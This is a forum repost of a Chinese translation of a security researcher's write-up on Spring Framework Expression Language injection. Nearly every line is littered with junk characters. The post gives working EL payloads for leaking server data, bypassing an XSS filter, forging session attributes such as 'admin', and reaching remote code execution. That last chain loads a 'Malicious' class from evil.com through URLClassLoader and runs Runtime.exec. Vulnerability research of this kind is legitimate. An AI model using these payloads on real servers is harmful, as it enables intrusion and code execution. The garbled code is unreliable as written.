Remote Code with
( D0 s2 U' P7 h: w" D1 Q K d( XExpression Language Injection
! b) n8 g" t# m7 `* uSpring Framework脆弱性—DanAmodio
' E- x6 O' ^( V全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
* |6 D- v T8 T& R# u可能会存在风险。& K0 p0 Y& _* l* ~
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的* A1 d, q" N6 M [5 x3 z
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可! v1 R3 @- {: _, H+ U. O
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
$ G' K" L6 C& v2 J, v' S5 q以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前$ t8 M0 r5 u2 q* F M5 b
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。; L! p, x7 p2 h7 U% F5 c- {% m
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但% O( F. N' w, Z- M
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版
& m' R s1 O7 A- z2 q0 X本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。' k+ r7 s2 Y8 V9 K; O
这些版本不支持禁用double EL resolution.! J' L2 }$ _& `9 L
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含2 c# A8 U) x; o# U) n6 s
EL2.2容器上可能进行远程代码执行。
4 n _# u9 h% A/ `& l这是一个原始信息泄露的攻击例子:
# i7 c0 \" g5 ^, Q3 F请求:' @9 k9 N0 z3 q( ?- U1 r/ w# v( g
ttp://vulnerable.com/foo?message=${applicationScope}
, G. e0 \& K" T& W到达以下内容页面:
: v, ~$ l9 F$ V结果将输出一些包含内部服务器信息calsspath 和本地工作目录1 W5 z2 i+ Z" R! o& I
你也可以做一些其他事情,如这样:# B, ]9 o1 ]1 _- V) k5 }, h
${9999+1}
, R6 ~8 U) Z; e. ]还可以访问session 对象和beans
. `( E' {% Z# u+ T9 ^; `' r${employee.lastName}
. [- i8 ?0 S8 z6 R在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是8 u/ K8 W* I" i' ~$ p* h
EL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东
9 Y8 h" q' I* _2 F# T! l西,比如XSS.
: i7 j7 n- W! `4 w3 O# n5 i" j* @哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签3 h2 y# A$ Y" Z" e" [4 E% }
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
( o( s3 _. A: l6 z呢?”& Z' d5 }3 h4 N9 d8 e8 e: O
因此,我尝试巳缦拢�
+ A6 m# S/ f' X( b" N/ Mhttp://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP9 T+ r2 `7 W8 _0 I( V
P
: a* Z1 y4 l/ p9 s我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返# Q' E% I+ `. `
回的文本被插入进了spring:message 标签。 y/ }" ~1 q3 y& A: E O
这里是一个最终绕过过滤的实例:* b% I! S6 f& Y7 T: X* b# i
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ. x0 U/ q1 H* n6 ]2 s
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
9 g7 y; ~! E% Z# @什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?8 A/ R5 I/ F$ m9 e" I
经过一番研究,我学习到EL2.2 增加了方法调用。
4 A e9 h- C- U& K+ P4 @; Z我写了一个快速测试应用程序代码并且检测一些功能
/ _) S8 ], F* s7 }. ]( a${pageContext.request.getSession().setAttribute(“account”,”123456″)}& s: N. H+ U6 X1 L0 h+ s, y
${pageContext.request.getSession().setAttribute(“admin”,true)}
8 X# N& V4 p# H- D, `好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的
" L9 P/ W) \) w! w( E指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?
7 |6 w9 z9 v& Z: t# A${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
3 T4 f3 R; z) g- |% M* d“, 1234)}
; {8 }2 T8 Z) G6 m% n1 V" A T${“”.getClass().forName(“java.lang.Runtime”)}
s5 C% s5 I! ^) v. b N哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不( A( q' y0 U2 C* F a
可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函
. J7 r5 z6 W1 T7 w( S数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
% v1 d# K% h- O5 V! b9 [ X4 E一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于 i; @/ D5 R% Q0 d) w6 e
方法签名invoke(Object obj, Object„ args); D$ Z) M% ~, h
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问5 A' g' S- N# z5 \
题,以让它可以工作起来。6 D% {4 E* u( N: D4 y* T- S
漏洞利用:& N5 a2 w2 d% ~4 h5 q
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我: }" F9 G+ c4 J- ?7 ], ]6 n
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
$ z1 Y w E1 W这里有一些我试过的失败的用例,为了试图让它工作的用例:& g, S" }. w3 h" }% B3 g1 A
写文件到文件系统- y0 N2 v6 e! Z8 |2 ^% |
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.
, } V3 _* w9 y5 M6 B) b# n我认为这些可以很好的工作,但是我不能找到合适的类来载入。
; X6 G0 \, v8 l: s${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}0 _* _* l) u7 r& A2 T# |
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:* K, r9 E- Y, n/ H. y' Y
org.springframework.expression.spel.standard.SpelExpressionParser not found" m+ Z. |! H" u: k/ x+ w
by
I: _+ n7 ?! n* korg.glassfish.web.javax.servlet.jsp [194].; B: P- G0 P7 v2 H; m; ]
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public! ?; w! @, b# m2 q
利用反射来创建一个新的Runtime(and watch the world burn)
4 y" m/ c* j1 J) }( [: I${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
1 y! h2 j1 X5 T! B5 c" A(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
0 S+ p. Y8 V- w2 x! T* L! H${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}- e+ s8 x6 I5 @0 f% k8 q
使用java.lang.ProcessBuilder" S; z; n' E7 E% N4 E
用表达式语言来评估表达式语言
9 W0 e0 L0 ?0 |. ]Expression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.# F! h) j# d- l
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request; b2 z/ i$ i; _* @0 u/ a
“,”".getClass(),null)}* Y2 t: w1 }( [5 s! h
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)6 u. \$ t7 G v9 I: f
我在使用一个空数组通过Method.invoke()时失败了很多次/ k- _) Z; P) j0 e4 W) ?
“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo0 _7 m* H7 q$ K3 j" V
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A2 [2 e7 Q% `3 g1 m5 j, o" k% a
rrayList”).newInstance().toArray())# x/ O% P- ^1 I k! d: E4 c) t
java.lang.IllegalArgumentException: wrong number of arguments/ M% T/ a' [+ N
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可( ^+ B0 U, i3 c k; O1 W
以创建一个恶意class文件并且指向类装载器./ o" p: D t" H; V
我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:3 J% v5 ^3 ~; s7 s6 q
public class Malicious {; w" q$ Q/ `7 u# v$ T3 M: E
public Malicious() {
& w' D9 n9 h' m. v1 jtry {+ y& V: c7 i6 O- F1 E& u
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
' P. W2 {& d* Pjava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
' T; j7 _" z4 J- ?} catch (Exception e) {
5 n* C; ]. ]& d, a3 U: u t& y}
) \0 {2 @1 r) n$ g0 L, H9 \}& u6 h/ H$ i: D8 L* x
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
) F8 A" e$ i7 U. @! n* _5 x话中,因此它可以被使用.
: x+ n$ a% s& X) X; j${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName
3 E& o3 D! I. l9 B1 x- n" a(“java.util.ArrayList”).newInstance())}
/ T% y+ y6 t. RURLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建
) ~5 Y% G5 C2 _" I一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和6 Z7 L7 c: j5 h
getResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个" f- B- `% H7 R) b. _- u
我们可以调用的create(string)方法,然后转换对一个URL对象。
" }8 K+ l3 g- e( s& Z( A${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
, y6 J& K. b2 w* s2 oere/malicious/classfile/is/located/”).toURL())}
+ Z$ c. l" B+ F U9 u" [% R- v% ~然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
4 T& j* a+ t0 e% C- u; C恶意类文件被装载并创建,触发远程代码.! N1 p) g. s3 w3 |. V
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte; O5 ^+ f" E) e; h! O z, F ]; R
xt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
7 r5 l, S4 U# c: D2 [9 lgetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance6 d1 d, I9 l% ]7 _+ F$ a
()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对